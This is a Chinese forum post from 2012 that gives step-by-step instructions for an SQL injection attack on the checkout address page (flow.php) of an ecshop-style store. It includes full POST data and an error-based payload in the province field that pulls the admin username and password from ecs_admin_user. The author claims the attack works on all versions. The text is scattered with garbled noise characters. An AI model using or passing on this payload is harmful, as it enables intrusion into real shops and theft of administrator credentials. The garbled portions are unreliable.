感谢欠杀的黑盒* p5 e p4 s. L
7 @- _, r' k) C( ]. h3 m# J
. y6 @/ j4 f5 p$ y( D. h把任意商品加入购物车在填写配送地址那一页,有地区选择
9 F2 R. S/ `" r) i$ X" F5 | s
8 G* J% J" [+ W, S. Iflow.php?step=consignee&direct_shopping=1
. M7 U1 Q! n5 r比如省选择安徽
; w. K8 {8 \( A- g( X# ^+ k$ Z & F3 |4 J2 U j3 g1 g
其中POST数据如下
1 O2 x6 K& V$ p1 b, L
$ z% D1 Z1 }5 f8 y* i6 ocountry=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3/ S6 j( L7 v+ V' q
改成; t' ~3 d7 S1 G3 Z8 m1 y
5 w; t" R- k _$ V. A" `province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #
$ A, F T- C! r0 V5 ips:详细的方法,用火狐tamper data插件……..即可改post内容….. p9 `/ X5 u+ Z1 d- ~
- R. N0 D" g4 m7 H6 \! t% _
先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包/ ~6 g% _& x$ _& ~- o# B: m: I( m+ O
0 ?7 v- }) ?5 n7 _
就会回显错误页面了。。。。
9 P9 Q0 w6 {4 q* h; s. q ; Z, \6 T. O6 G5 f9 W$ l/ K( s
我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的
2 V, {; }, s4 V5 F. g6 L& g |
发表于 2012-12-31 09:19:27
收藏
支持
反对